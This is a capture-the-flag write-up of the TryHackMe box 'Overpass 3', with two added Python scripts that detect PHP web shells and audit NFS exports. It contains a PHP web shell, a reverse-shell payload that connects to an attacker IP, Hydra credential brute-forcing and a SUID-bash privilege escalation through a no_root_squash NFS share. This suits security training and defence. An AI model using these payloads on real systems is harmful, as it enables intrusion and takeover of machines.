THM: Overpass 3 - Hosting
Overpass3
You know them, you love them, your favourite group of broke computer science students have another business venture! Show them that they probably should hire someone for security…
This is Overpass 3 - Hosting from THM. It’s medium rated. I add overpass3 to /etc/hosts.
Ports
We’ve got FTP, SSH and HTTP on the standard ports.
FTP
No anonymous access, we’ll move on for now.
HTTP
I started trying dirsearch and I must say it’s pretty comfy:
root@kali:/opt/tryhackme/overpass3# python3 /opt/dirsearch/dirsearch.py -u http://overpass3
It comes with its own wordlist (although you can use any), and it finds something useful:
[05:22:59] 301 - 233B - /backups -> http://overpass3/backups/
[05:23:00] 200 - 894B - /backups/
From there, we get a file called backup.zip, which is not password protected and which contains two files:
12K -rw-r--r-- 1 root root 11K Nov 8 16:18 CustomerDetails.xlsx.gpg
4.0K -rw------- 1 root root 3.5K Nov 8 16:16 priv.key
This is PGP stuff:
root@kali:/opt/tryhackme/overpass3/temporary# gpg --import priv.key
gpg: key C9AE71AB3180BC08: "Paradox <[email protected]>" not changed
gpg: key C9AE71AB3180BC08: secret key imported
gpg: Total number processed: 1
gpg: unchanged: 1
gpg: secret keys read: 1
gpg: secret keys unchanged: 1
root@kali:/opt/tryhackme/overpass3/temporary# gpg --decrypt CustomerDetails.xlsx.gpg > details.xlsx
gpg: encrypted with 2048-bit RSA key, ID 9E86A1C63FB96335, created 2020-11-08
"Paradox <[email protected]>"
This gets us an Excel file containing 3 usernames and passwords.
Hydra
Which service to use this on? We can try them both:
root@kali:/opt/tryhackme/overpass3# hydra -L users.txt -P pass.txt ftp://overpass3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-14 05:31:48
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ftp://overpass3:21/
[21][ftp] host: overpass3 login: paradox password: REDACTED
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-14 05:31:53
root@kali:/opt/tryhackme/overpass3# hydra -L users.txt -P pass.txt ssh://overpass3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-14 05:32:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ssh://overpass3:22/
[ERROR] target ssh://10.10.188.216:22/ does not support password authentication (method reply 36).
Right, so we can log in to FTP, but SSH is key based only. Goodo.
FTP, again
We log in to FTP and land in the webserver's document root. A little testing shows we can upload to this directory, so I upload something simple in a file called cmd.php:
<?php system($_GET['cmd']);?>
And I send it this from Burpsuite:
cmd=php+-r+'$sock%3dfsockopen("10.9.10.123",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b'
to get a shell.
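From the defender's side, a cmd.php like the one above is exactly what a periodic scan of the document root should catch, and an FTP account that can write into that root is the finding to fix. The following is an added example (my own code, not from the original post): it flags PHP files where a command-execution or eval sink is fed a superglobal, and runs itself against a constructed throwaway webroot containing the one-liner above.

```python
import os
import re
import tempfile

# PHP sinks that run an OS command or evaluate code.
EXEC_SINKS = r"(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
# User-controlled superglobals that should never reach a sink unfiltered.
USER_INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER|FILES)\b"
# A sink whose argument list contains a superglobal, as in system($_GET['cmd']).
PATTERN = re.compile(rf"\b{EXEC_SINKS}\s*\(\s*[^;]*?{USER_INPUT}", re.IGNORECASE)

def suspicious_php(source):
    """Return every sink-fed-by-user-input call found in a PHP source string."""
    return [m.group(0) for m in PATTERN.finditer(source)]

def scan_webroot(root):
    """Map each PHP file under a document root to its suspicious calls."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".phar")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = suspicious_php(fh.read())
            if found:
                hits[os.path.relpath(path, root)] = found
    return hits

# Constructed samples: the one-liner from the post and a benign page.
SAMPLE_WEBSHELL = "<?php system($_GET['cmd']);?>"
SAMPLE_BENIGN = "<?php echo htmlspecialchars($_GET['name']); ?>"

def demo():
    """Build a throwaway webroot from the samples, scan it, return the hits."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "backups"))
        with open(os.path.join(root, "cmd.php"), "w") as fh:
            fh.write(SAMPLE_WEBSHELL)
        with open(os.path.join(root, "backups", "index.php"), "w") as fh:
            fh.write(SAMPLE_BENIGN)
        return scan_webroot(root)

if __name__ == "__main__":
    for path, calls in demo().items():
        print(f"{path}: {calls}")
```

The regex is a heuristic (it stops at the first semicolon and ignores obfuscated sinks), so treat a hit as something to read, not as proof on its own.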
Apache
The host is running CentOS and we are the Apache user. We don’t seem to have which; no matter.
sh-4.4$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
sh-4.4$ which python3
which python3
which: no python3 in ((null))
sh-4.4$ ls /usr/bin | grep python
ls /usr/bin | grep python
python3
python3.6
python3.6m
unversioned-python
sh-4.4$ /usr/bin/python3 -c 'import pty;pty.spawn("/bin/bash");'
/usr/bin/python3 -c 'import pty;pty.spawn("/bin/bash");'
bash-4.4$
From bash, we can su to paradox using the same password as for the FTP account. He has a .ssh directory in his home, and we can add our key to his authorized_keys file to get SSH access:
[paradox@localhost .ssh]$ printf 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCeyp%%AND THE REST OF MY PUBLIC KEY%%/orR1AjlnSE= root@kali\n' >> authorized_keys
Now we can just do:
root@kali:/opt/tryhackme/overpass3# ssh paradox@overpass3
Last login: Thu Jan 14 10:40:45 2021
[paradox@localhost ~]$
James
As paradox I run linpeas, which finds this in /etc/exports:
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
However, thinking back, port 2049 wasn't among the open ports, so NFS is only listening on localhost. We can't mount the share on this host either, because we aren't root. Hmm.
SSH Tunnel
We can mount the share using an SSH tunnel on our local machine. First, we set up the tunnel:
root@kali:/opt/tryhackme/overpass3# ssh -L 3049:127.0.0.1:2049 paradox@overpass3
Next, we mount the share:
root@kali:/opt/tryhackme/overpass3# mount -t nfs -o port=3049,vers=4 127.0.0.1:/ ./mnt
Where ./mnt was a local folder I'd created. Note this syntax caused me quite a few headaches, particularly the path part: NFSv4 is different to NFSv3, and because the export is flagged fsid=0 it becomes the NFSv4 pseudo-root, so the shared path is considered / when you mount it.
From there, we could get the user flag:
root@kali:/opt/tryhackme/overpass3/mnt# ls -lash
total 20K
0 drwx------ 3 james kali 112 Nov 17 16:15 .
4.0K drwxr-xr-x 5 root root 4.0K Jan 13 05:48 ..
0 lrwxrwxrwx 1 root root 9 Nov 8 16:45 .bash_history -> /dev/null
4.0K -rw-r--r-- 1 james kali 18 Nov 8 2019 .bash_logout
4.0K -rw-r--r-- 1 james kali 141 Nov 8 2019 .bash_profile
4.0K -rw-r--r-- 1 james kali 312 Nov 8 2019 .bashrc
0 drwx------ 2 james kali 61 Nov 7 21:20 .ssh
4.0K -rw------- 1 james kali 38 Nov 17 16:15 user.flag
Note there was also a web flag belonging to Apache; it was in the home directory for the apache user. We can find that by looking in /etc/passwd; it’s /usr/share/httpd. Anyway, onwards …
Root
Privesc was now a fairly classic NFS technique - make a copy of bash in our mounted drive and give it the SUID bit:
root@kali:/opt/tryhackme/overpass3/mnt# cp /bin/bash .
root@kali:/opt/tryhackme/overpass3/mnt# chmod +s bash
Doesn’t look like much, does it? While I’m at it, I add my SSH public key to the authorized_keys file for james just like I did for paradox.
Separately:
root@kali:/opt/tryhackme/overpass3# ssh james@overpass3
Last login: Thu Jan 14 09:15:57 2021 from 10.9.10.123
[james@localhost ~]$ pwd
/home/james
[james@localhost ~]$ ls -lash
total 1.2M
0 drwx------. 4 james james 138 Jan 14 10:14 .
0 drwxr-xr-x. 4 root root 34 Nov 8 19:34 ..
1.2M -rwsr-sr-x 1 root root 1.2M Jan 14 10:14 bash
0 lrwxrwxrwx. 1 root root 9 Nov 8 21:45 .bash_history -> /dev/null
4.0K -rw-r--r--. 1 james james 18 Nov 8 2019 .bash_logout
4.0K -rw-r--r--. 1 james james 141 Nov 8 2019 .bash_profile
4.0K -rw-r--r--. 1 james james 312 Nov 8 2019 .bashrc
0 drwx------ 2 james james 44 Jan 14 09:17 .gnupg
0 drwx------. 2 james james 61 Nov 8 02:20 .ssh
4.0K -rw-------. 1 james james 38 Nov 17 21:15 user.flag
[james@localhost ~]$ ./bash -p
./bash: /lib64/libtinfo.so.6: no version information available (required by ./bash)
bash-5.1# id
uid=1000(james) gid=1000(james) euid=0(root) egid=0(root) groups=0(root),1000(james)
bash-5.1#
And that was that.
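The /etc/exports line linpeas found and the SUID-copy trick above are two halves of the same misconfiguration, so one added example covers both (this is my own code, not part of the original post or the box): it parses /etc/exports, resolves each client's effective options against the nfsd defaults, and flags the combination that made the privesc possible: a wildcard client, no_root_squash, insecure and a writable export. The sample file is constructed from the entry on the box plus a tighter entry for contrast.

```python
import re

# Options nfsd applies when an export entry does not say otherwise.
DEFAULTS = {"root_squash", "secure", "ro", "sync"}
# Options that replace one of those defaults when written explicitly.
OVERRIDES = {"no_root_squash": "root_squash", "insecure": "secure",
             "rw": "ro", "async": "sync"}
# One client spec: host pattern, optionally followed directly by "(opt,...)".
CLIENT_RE = re.compile(r"(\S+?)(?:\((.*?)\))?(?=\s|$)")

def effective_options(option_str):
    """Resolve a 'rw,no_root_squash' style list against the defaults."""
    opts = set(DEFAULTS)
    for opt in filter(None, option_str.split(",")):
        opts.discard(OVERRIDES.get(opt, ""))
        opts.add(opt)
    return opts

def parse_exports(text):
    """Yield (path, client, effective option set) for every export entry."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"\s+", line, maxsplit=1)
        for m in CLIENT_RE.finditer(parts[1] if len(parts) > 1 else ""):
            yield parts[0], m.group(1), effective_options(m.group(2) or "")

def audit_exports(text):
    """Return (path, client, [problems]) for each entry worth fixing."""
    findings = []
    for path, client, opts in parse_exports(text):
        problems = []
        if client.startswith("*"):
            problems.append("wildcard client: any host reaching the port may mount")
        if "no_root_squash" in opts:
            problems.append("no_root_squash: client root can plant setuid-root files")
        if "insecure" in opts:
            problems.append("insecure: mounts accepted from unprivileged source ports")
        if problems and "rw" in opts:
            problems.append("rw: the export is writable")
        if problems:
            findings.append((path, client, problems))
    return findings

# Constructed sample: the entry from the box plus a tighter one for contrast.
SAMPLE_EXPORTS = """\
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
/srv/share 10.0.0.0/24(ro,root_squash)
"""
```

Binding nfsd to localhost did not help here because the insecure option let a forwarded high port mount the share; the fix is root_squash plus an explicit client list, and a nosuid mount on the client side as a second layer.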
Footnote
I haven’t written anything for a bit; I’ve been trying (and failing) on EnterPrize, a new hard box on THM. I’ve enumerated the box, found the hidden subdomain (maintest.enterprize.thm) and poked around. It’s typo3, and I am fairly sure the exploit is a PHP deserialization as described here using a leaked encryptionKey, which can be found on the box and which I have. However I have tried the exploit as described and so far I can’t get it to work. Ah well, it’s kept me entertained anyway.